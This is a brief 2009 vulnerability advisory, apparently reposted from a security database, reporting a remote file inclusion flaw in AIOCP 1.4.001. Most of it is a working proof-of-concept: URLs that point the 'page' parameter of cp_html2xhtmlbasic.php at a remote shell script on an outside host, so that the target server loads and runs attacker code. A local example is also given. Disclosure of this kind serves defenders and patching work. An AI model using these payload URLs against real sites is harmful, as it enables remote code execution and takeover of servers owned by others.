Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22570
HistoryOct 07, 2009 - 12:00 a.m.

Remote File Inclusion In AIOCP

2009-10-0700:00:00
vulners.com
10

###########################################

Aiocp 1.4.001 Remote File Inclusion vulnerability

Found by : Hadi Kiamarsi

Contact : hadikiamarsi [at] hotmail.com

Download :

http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download

###########################################

PoC :

http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL]

example :

http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php

local Example :

http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php